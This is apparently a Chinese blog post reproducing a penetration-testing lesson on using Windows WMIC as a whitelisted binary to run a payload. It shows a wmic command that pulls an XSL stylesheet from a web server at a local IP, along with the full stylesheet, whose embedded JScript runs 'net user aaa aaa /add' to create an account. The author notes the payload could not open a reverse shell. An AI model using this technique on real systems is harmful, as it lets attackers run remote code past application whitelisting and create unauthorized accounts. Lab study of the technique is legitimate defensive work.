对亮神基于白名单Wmic 执行 payload 第十季复现

其他 2019-05-06 12:31:19 阅读次数: 0

0x01 Wmic简介：

WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具），提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前，如果要管理WMI系统，必须使用一些专门的WMI应用，例如SMS，或者使用WMI的脚本编程API，或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言，或者不掌握WMI名称空间的基本知识，要用WMI管理系统是很困难的。WMIC改变了这种情况

0x01 环境

win7 192.168.0.112

0x02复现

靶机
在这里插入图片描述

wmic os get /FORMAT:"http://192.168.0.122/jiu.xsl"

任意一台能有web服务即可
在这里插入图片描述

0x03 jiu.xsl

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("net user aaa aaa /add");
	]]> </ms:script>
</stylesheet>

0x04 总结

payload无法反弹shell（待补充）。

0x05 借鉴

https://github.com/Micropoor/Micro8/blob/master/第八十课：基于白名单Wmic执行payload第十季.pdf

猜你喜欢

转载自blog.csdn.net/ws13129/article/details/89791442

对亮神基于白名单Wmic 执行 payload 第十季复现

对亮神基于白名单odbcconf.exe执行payload第十er季复现

对亮神基于白名单 Msiexec 执行 Payload 第八季复现

对亮神基于白名单Mshta.exe 执行 payload 第五季复现

对亮神基于白名单Regsvr32 执行 payload 第九季复现

对亮神基于白名单 Csc.exe 执行 payload 第七季复现

对亮神基于白名单 Compiler.Exe 执行 Payload 第六季复现

对亮神基于白名单Regasm.Exe 执行 payload 第三季复现

对亮神基于白名单Rundll32.exe执行payload第十一季复现

对亮神基于白名单 PsExec 执行 payload 第十三季复现

对亮神基于白名单regsvcs.exe执行payload第四季复现

对亮神基于白名单Installutil.exe 执行 payload 第二季复现

对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现

渗透测试-基于白名单执行payload--Cmstp

渗透测试-基于白名单执行payload--Odbcconf

渗透测试-基于白名单执行payload--Csc

渗透测试-基于白名单执行payload--Msiexec

渗透测试-基于白名单执行payload--Forfiles

渗透测试-基于白名单执行payload--Pcalua

【免杀篇】远控免杀专题(53)-白名单WMIC.exe执行payload

渗透测试-基于白名单执行payload--Regsvr32

渗透测试-基于白名单执行payload--zipfldr.dll

【免杀篇】远控免杀专题(62)-白名单CScript/WScript执行payload

【免杀篇】远控免杀专题(57)-白名单Url.dll执行payload

【免杀篇】远控免杀专题(56)-白名单zipfldr.dll执行payload

【免杀篇】远控免杀专题(55)-白名单Pcalua.exe执行payload

【免杀篇】远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

【免杀篇】远控免杀专题(52)-白名单psexec.exe执行payload

【免杀篇】远控免杀专题(51)-白名单msdeloy.exe执行payload

【免杀篇】远控免杀专题(50)-白名单winword.exe执行payload

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)